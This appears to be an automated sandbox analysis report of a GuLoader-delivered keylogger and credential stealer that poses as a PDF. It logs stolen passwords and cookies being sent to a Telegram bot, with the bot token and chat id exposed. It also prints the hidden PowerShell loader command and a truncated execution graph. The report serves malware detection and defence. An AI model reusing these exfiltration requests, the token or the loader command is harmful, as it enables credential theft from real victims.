                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8ebc46049ff543b2-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1788&min_rtt=1784&rtt_var=677&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1606160&cwnd=236&unsent_bytes=0&cid=55a53b380b1f63de&ts=478&x=0"
                                                                                                                                                                                  2024-12-02 15:15:38 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  11192.168.2.449839149.154.167.2204437852C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-12-02 15:15:40 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2003/12/2024%20/%2017:47:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                                                                  Host: api.telegram.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  2024-12-02 15:15:40 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                                                                  Date: Mon, 02 Dec 2024 15:15:40 GMT
                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                  Content-Length: 55
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                  2024-12-02 15:15:40 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                                                                  Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  12192.168.2.449855149.154.167.2204437852C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-12-02 15:15:48 UTC344OUTPOST /bot8138030788:AAEti5Rsvkh3t9x1DE3f72xKiRnG5XE9PkI/sendDocument?chat_id=7844469787&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=------------------------8dd144b65092187
                                                                                                                                                                                  Host: api.telegram.org
                                                                                                                                                                                  Content-Length: 581
                                                                                                                                                                                  2024-12-02 15:15:48 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 34 34 62 36 35 30 39 32 31 38 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 30 35 34 36 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 30 32 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 34 3a 35 39 0d
                                                                                                                                                                                  Data Ascii: --------------------------8dd144b65092187Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:405464Date and Time: 02/12/2024 / 10:14:59
                                                                                                                                                                                  2024-12-02 15:15:49 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                                                                  Date: Mon, 02 Dec 2024 15:15:49 GMT
                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                  Content-Length: 528
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                  2024-12-02 15:15:49 UTC528INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 35 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 31 33 38 30 33 30 37 38 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4b 69 6e 64 6f 6e 6a 75 65 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4b 68 69 6a 6e 64 6a 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 38 34 34 34 36 39 37 38 37 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 75 72 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 42 69 6c 6c 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 75 72 65 79 6c 62 69 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 31 35 32 35 34 39 2c 22 64 6f 63 75 6d 65
                                                                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":59,"from":{"id":8138030788,"is_bot":true,"first_name":"Kindonjueh","username":"Khijndjbot"},"chat":{"id":7844469787,"first_name":"Sure","last_name":"Bill","username":"Sureylbit","type":"private"},"date":1733152549,"docume


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  13192.168.2.449863149.154.167.2204437852C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-12-02 15:15:52 UTC374OUTPOST /bot8138030788:AAEti5Rsvkh3t9x1DE3f72xKiRnG5XE9PkI/sendDocument?chat_id=7844469787&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=------------------------8dd1476a1d87ad0
                                                                                                                                                                                  Host: api.telegram.org
                                                                                                                                                                                  Content-Length: 7046
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  2024-12-02 15:15:52 UTC7046OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 34 37 36 61 31 64 38 37 61 64 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 30 35 34 36 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 30 32 2f 31 32 2f 32 30 32 34 20 2f
                                                                                                                                                                                  Data Ascii: --------------------------8dd1476a1d87ad0Content-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies | user | VIP Recovery PC Name:405464Date and Time: 02/12/2024 /
                                                                                                                                                                                  2024-12-02 15:15:52 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                                                                  Date: Mon, 02 Dec 2024 15:15:52 GMT
                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                  Content-Length: 539
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                  2024-12-02 15:15:52 UTC539INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 31 33 38 30 33 30 37 38 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4b 69 6e 64 6f 6e 6a 75 65 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4b 68 69 6a 6e 64 6a 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 38 34 34 34 36 39 37 38 37 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 75 72 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 42 69 6c 6c 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 75 72 65 79 6c 62 69 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 31 35 32 35 35 32 2c 22 64 6f 63 75 6d 65
                                                                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":60,"from":{"id":8138030788,"is_bot":true,"first_name":"Kindonjueh","username":"Khijndjbot"},"chat":{"id":7844469787,"first_name":"Sure","last_name":"Bill","username":"Sureylbit","type":"private"},"date":1733152552,"docume


                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                  Start time:10:13:57
                                                                                                                                                                                  Start date:02/12/2024
                                                                                                                                                                                  Path:C:\Users\user\Desktop\678763_PDF.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\678763_PDF.exe"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:711'659 bytes
                                                                                                                                                                                  MD5 hash:42B3EEFF606C41053B2B30E6DF1BAA87
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                  Start time:10:13:58
                                                                                                                                                                                  Start date:02/12/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:powershell.exe -windowstyle hidden "$Epigraphic93=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Internist\Hyperimmune.Mus';$Miljerne=$Epigraphic93.SubString(70004,3);.$Miljerne($Epigraphic93) "
                                                                                                                                                                                  Imagebase:0x830000
                                                                                                                                                                                  File size:433'152 bytes
                                                                                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2156462288.000000000A4F3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                  Start time:10:13:58
                                                                                                                                                                                  Start date:02/12/2024
                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                  Start time:10:14:44
                                                                                                                                                                                  Start date:02/12/2024
                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:711'659 bytes
                                                                                                                                                                                  MD5 hash:42B3EEFF606C41053B2B30E6DF1BAA87
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.2955973665.0000000020D4F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.2955973665.0000000020D4F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2955973665.0000000020CD8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2955973665.0000000020BD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                  • Detection: 16%, ReversingLabs
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Reset < >

                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                    Execution Coverage:22.5%
                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                    Signature Coverage:16.5%
                                                                                                                                                                                    Total number of Nodes:1350
                                                                                                                                                                                    Total number of Limit Nodes:30
                                                                                                                                                                                    execution_graph 3738 404f43 GetDlgItem GetDlgItem 3739 404f95 7 API calls 3738->3739 3747 4051ba 3738->3747 3740 40503c DeleteObject 3739->3740 3741 40502f SendMessageW 3739->3741 3742 405045 3740->3742 3741->3740 3743 40507c 3742->3743 3748 406594 21 API calls 3742->3748 3745 4044d6 22 API calls 3743->3745 3744 40529c 3746 405348 3744->3746 3751 4051ad 3744->3751 3757 4052f5 SendMessageW 3744->3757 3750 405090 3745->3750 3752 405352 SendMessageW 3746->3752 3753 40535a 3746->3753 3747->3744 3772 405229 3747->3772 3792 404e91 SendMessageW 3747->3792 3749 40505e SendMessageW SendMessageW 3748->3749 3749->3742 3756 4044d6 22 API calls 3750->3756 3754 40453d 8 API calls 3751->3754 3752->3753 3760 405373 3753->3760 3761 40536c ImageList_Destroy 3753->3761 3768 405383 3753->3768 3759 405549 3754->3759 3773 4050a1 3756->3773 3757->3751 3763 40530a SendMessageW 3757->3763 3758 40528e SendMessageW 3758->3744 3764 40537c GlobalFree 3760->3764 3760->3768 3761->3760 3762 4054fd 3762->3751 3769 40550f ShowWindow GetDlgItem ShowWindow 3762->3769 3766 40531d 3763->3766 3764->3768 3765 40517c GetWindowLongW SetWindowLongW 3767 405195 3765->3767 3777 40532e SendMessageW 3766->3777 3770 4051b2 3767->3770 3771 40519a ShowWindow 3767->3771 3768->3762 3785 4053be 3768->3785 3797 404f11 3768->3797 3769->3751 3791 40450b SendMessageW 3770->3791 3790 40450b SendMessageW 3771->3790 3772->3744 3772->3758 3773->3765 3776 4050f4 SendMessageW 3773->3776 3778 405177 3773->3778 3779 405132 SendMessageW 3773->3779 3780 405146 SendMessageW 3773->3780 3776->3773 3777->3746 3778->3765 3778->3767 3779->3773 3780->3773 3782 4054c8 3783 4054d3 InvalidateRect 3782->3783 3787 4054df 3782->3787 3783->3787 3784 4053ec SendMessageW 3786 405402 3784->3786 3785->3784 3785->3786 3786->3782 3788 405476 SendMessageW SendMessageW 3786->3788 3787->3762 3806 404e4c 3787->3806 3788->3786 3790->3751 3791->3747 3793 404ef0 SendMessageW 3792->3793 3794 404eb4 GetMessagePos ScreenToClient SendMessageW 3792->3794 3795 404ee8 3793->3795 3794->3795 3796 404eed 3794->3796 3795->3772 3796->3793 3809 406557 lstrcpynW 3797->3809 3799 404f24 3810 40649e wsprintfW 3799->3810 3801 404f2e 3802 40140b 2 API calls 3801->3802 3803 404f37 3802->3803 3811 406557 lstrcpynW 3803->3811 3805 404f3e 3805->3785 3812 404d83 3806->3812 3808 404e61 3808->3762 3809->3799 3810->3801 3811->3805 3813 404d9c 3812->3813 3814 406594 21 API calls 3813->3814 3815 404e00 3814->3815 3816 406594 21 API calls 3815->3816 3817 404e0b 3816->3817 3818 406594 21 API calls 3817->3818 3819 404e21 lstrlenW wsprintfW SetDlgItemTextW 3818->3819 3819->3808 3820 402643 3821 402672 3820->3821 3822 402657 3820->3822 3824 4026a2 3821->3824 3825 402677 3821->3825 3823 402d89 21 API calls 3822->3823 3834 40265e 3823->3834 3827 402dab 21 API calls 3824->3827 3826 402dab 21 API calls 3825->3826 3828 40267e 3826->3828 3829 4026a9 lstrlenW 3827->3829 3837 406579 WideCharToMultiByte 3828->3837 3829->3834 3831 402692 lstrlenA 3831->3834 3832 4026d6 3833 4026ec 3832->3833 3835 4060f9 WriteFile 3832->3835 3834->3832 3834->3833 3838 406128 SetFilePointer 3834->3838 3835->3833 3837->3831 3839 406144 3838->3839 3840 40615c 3838->3840 3841 4060ca ReadFile 3839->3841 3840->3832 3842 406150 3841->3842 3842->3840 3843 406165 SetFilePointer 3842->3843 3844 40618d SetFilePointer 3842->3844 3843->3844 3845 406170 3843->3845 3844->3840 3846 4060f9 WriteFile 3845->3846 3846->3840 3015 401946 3016 401948 3015->3016 3017 402dab 21 API calls 3016->3017 3018 40194d 3017->3018 3021 405c63 3018->3021 3061 405f2e 3021->3061 3024 405ca2 3027 405dcd 3024->3027 3075 406557 lstrcpynW 3024->3075 3025 405c8b DeleteFileW 3026 401956 3025->3026 3027->3026 3104 4068b4 FindFirstFileW 3027->3104 3029 405cc8 3030 405cdb 3029->3030 3031 405cce lstrcatW 3029->3031 3076 405e72 lstrlenW 3030->3076 3032 405ce1 3031->3032 3035 405cf1 lstrcatW 3032->3035 3036 405ce7 3032->3036 3039 405cfc lstrlenW FindFirstFileW 3035->3039 3036->3035 3036->3039 3038 405deb 3107 405e26 lstrlenW CharPrevW 3038->3107 3041 405dc2 3039->3041 3042 405d1e 3039->3042 3041->3027 3044 405da5 FindNextFileW 3042->3044 3054 405c63 64 API calls 3042->3054 3056 4055dc 28 API calls 3042->3056 3080 406557 lstrcpynW 3042->3080 3081 405c1b 3042->3081 3089 4055dc 3042->3089 3100 406317 MoveFileExW 3042->3100 3044->3042 3048 405dbb FindClose 3044->3048 3045 405c1b 5 API calls 3047 405dfd 3045->3047 3049 405e17 3047->3049 3050 405e01 3047->3050 3048->3041 3052 4055dc 28 API calls 3049->3052 3050->3026 3053 4055dc 28 API calls 3050->3053 3052->3026 3055 405e0e 3053->3055 3054->3042 3057 406317 40 API calls 3055->3057 3056->3044 3058 405e15 3057->3058 3058->3026 3110 406557 lstrcpynW 3061->3110 3063 405f3f 3111 405ed1 CharNextW CharNextW 3063->3111 3066 405c83 3066->3024 3066->3025 3067 406805 5 API calls 3073 405f55 3067->3073 3068 405f86 lstrlenW 3069 405f91 3068->3069 3068->3073 3071 405e26 3 API calls 3069->3071 3070 4068b4 2 API calls 3070->3073 3072 405f96 GetFileAttributesW 3071->3072 3072->3066 3073->3066 3073->3068 3073->3070 3074 405e72 2 API calls 3073->3074 3074->3068 3075->3029 3077 405e80 3076->3077 3078 405e92 3077->3078 3079 405e86 CharPrevW 3077->3079 3078->3032 3079->3077 3079->3078 3080->3042 3117 406022 GetFileAttributesW 3081->3117 3084 405c48 3084->3042 3085 405c36 RemoveDirectoryW 3087 405c44 3085->3087 3086 405c3e DeleteFileW 3086->3087 3087->3084 3088 405c54 SetFileAttributesW 3087->3088 3088->3084 3090 4055f7 3089->3090 3099 405699 3089->3099 3091 405613 lstrlenW 3090->3091 3092 406594 21 API calls 3090->3092 3093 405621 lstrlenW 3091->3093 3094 40563c 3091->3094 3092->3091 3095 405633 lstrcatW 3093->3095 3093->3099 3096 405642 SetWindowTextW 3094->3096 3097 40564f 3094->3097 3095->3094 3096->3097 3098 405655 SendMessageW SendMessageW SendMessageW 3097->3098 3097->3099 3098->3099 3099->3042 3101 406338 3100->3101 3102 40632b 3100->3102 3101->3042 3120 40619d 3102->3120 3105 405de7 3104->3105 3106 4068ca FindClose 3104->3106 3105->3026 3105->3038 3106->3105 3108 405e42 lstrcatW 3107->3108 3109 405df1 3107->3109 3108->3109 3109->3045 3110->3063 3112 405eee 3111->3112 3114 405f00 3111->3114 3113 405efb CharNextW 3112->3113 3112->3114 3116 405f24 3113->3116 3115 405e53 CharNextW 3114->3115 3114->3116 3115->3114 3116->3066 3116->3067 3118 405c27 3117->3118 3119 406034 SetFileAttributesW 3117->3119 3118->3084 3118->3085 3118->3086 3119->3118 3121 4061f3 GetShortPathNameW 3120->3121 3122 4061cd 3120->3122 3123 406312 3121->3123 3124 406208 3121->3124 3147 406047 GetFileAttributesW CreateFileW 3122->3147 3123->3101 3124->3123 3126 406210 wsprintfA 3124->3126 3128 406594 21 API calls 3126->3128 3127 4061d7 CloseHandle GetShortPathNameW 3127->3123 3129 4061eb 3127->3129 3130 406238 3128->3130 3129->3121 3129->3123 3148 406047 GetFileAttributesW CreateFileW 3130->3148 3132 406245 3132->3123 3133 406254 GetFileSize GlobalAlloc 3132->3133 3134 406276 3133->3134 3135 40630b CloseHandle 3133->3135 3149 4060ca ReadFile 3134->3149 3135->3123 3140 406295 lstrcpyA 3143 4062b7 3140->3143 3141 4062a9 3142 405fac 4 API calls 3141->3142 3142->3143 3144 4062ee SetFilePointer 3143->3144 3156 4060f9 WriteFile 3144->3156 3147->3127 3148->3132 3150 4060e8 3149->3150 3150->3135 3151 405fac lstrlenA 3150->3151 3152 405fed lstrlenA 3151->3152 3153 405ff5 3152->3153 3154 405fc6 lstrcmpiA 3152->3154 3153->3140 3153->3141 3154->3153 3155 405fe4 CharNextA 3154->3155 3155->3152 3157 406117 GlobalFree 3156->3157 3157->3135 3158 4015c6 3159 402dab 21 API calls 3158->3159 3160 4015cd 3159->3160 3161 405ed1 4 API calls 3160->3161 3173 4015d6 3161->3173 3162 401636 3164 401668 3162->3164 3165 40163b 3162->3165 3163 405e53 CharNextW 3163->3173 3168 401423 28 API calls 3164->3168 3183 401423 3165->3183 3175 401660 3168->3175 3172 40164f SetCurrentDirectoryW 3172->3175 3173->3162 3173->3163 3174 40161c GetFileAttributesW 3173->3174 3177 405b22 3173->3177 3180 405aab CreateDirectoryW 3173->3180 3187 405b05 CreateDirectoryW 3173->3187 3174->3173 3178 40694b 5 API calls 3177->3178 3179 405b29 3178->3179 3179->3173 3181 405af7 3180->3181 3182 405afb GetLastError 3180->3182 3181->3173 3182->3181 3184 4055dc 28 API calls 3183->3184 3185 401431 3184->3185 3186 406557 lstrcpynW 3185->3186 3186->3172 3188 405b15 3187->3188 3189 405b19 GetLastError 3187->3189 3188->3173 3189->3188 3847 404646 lstrlenW 3848 404665 3847->3848 3849 404667 WideCharToMultiByte 3847->3849 3848->3849 3850 4049c7 3851 4049f3 3850->3851 3852 404a04 3850->3852 3911 405b9b GetDlgItemTextW 3851->3911 3853 404a10 GetDlgItem 3852->3853 3856 404a6f 3852->3856 3855 404a24 3853->3855 3860 404a38 SetWindowTextW 3855->3860 3863 405ed1 4 API calls 3855->3863 3857 404b53 3856->3857 3865 406594 21 API calls 3856->3865 3909 404d02 3856->3909 3857->3909 3913 405b9b GetDlgItemTextW 3857->3913 3858 4049fe 3859 406805 5 API calls 3858->3859 3859->3852 3864 4044d6 22 API calls 3860->3864 3862 40453d 8 API calls 3867 404d16 3862->3867 3868 404a2e 3863->3868 3869 404a54 3864->3869 3870 404ae3 SHBrowseForFolderW 3865->3870 3866 404b83 3871 405f2e 18 API calls 3866->3871 3868->3860 3875 405e26 3 API calls 3868->3875 3872 4044d6 22 API calls 3869->3872 3870->3857 3873 404afb CoTaskMemFree 3870->3873 3874 404b89 3871->3874 3876 404a62 3872->3876 3877 405e26 3 API calls 3873->3877 3914 406557 lstrcpynW 3874->3914 3875->3860 3912 40450b SendMessageW 3876->3912 3882 404b08 3877->3882 3880 404ba0 3885 40694b 5 API calls 3880->3885 3881 404a68 3884 40694b 5 API calls 3881->3884 3883 404b3f SetDlgItemTextW 3882->3883 3886 406594 21 API calls 3882->3886 3883->3857 3884->3856 3892 404ba7 3885->3892 3887 404b27 lstrcmpiW 3886->3887 3887->3883 3889 404b38 lstrcatW 3887->3889 3888 404be8 3915 406557 lstrcpynW 3888->3915 3889->3883 3891 404bef 3893 405ed1 4 API calls 3891->3893 3892->3888 3897 405e72 2 API calls 3892->3897 3898 404c40 3892->3898 3894 404bf5 GetDiskFreeSpaceW 3893->3894 3896 404c19 MulDiv 3894->3896 3894->3898 3896->3898 3897->3892 3899 404cb1 3898->3899 3901 404e4c 24 API calls 3898->3901 3900 404cd4 3899->3900 3903 40140b 2 API calls 3899->3903 3916 4044f8 KiUserCallbackDispatcher 3900->3916 3902 404c9e 3901->3902 3904 404cb3 SetDlgItemTextW 3902->3904 3905 404ca3 3902->3905 3903->3900 3904->3899 3907 404d83 24 API calls 3905->3907 3907->3899 3908 404cf0 3908->3909 3917 404920 3908->3917 3909->3862 3911->3858 3912->3881 3913->3866 3914->3880 3915->3891 3916->3908 3918 404933 SendMessageW 3917->3918 3919 40492e 3917->3919 3918->3909 3919->3918 3920 401c48 3921 402d89 21 API calls 3920->3921 3922 401c4f 3921->3922 3923 402d89 21 API calls 3922->3923 3924 401c5c 3923->3924 3925 401c71 3924->3925 3926 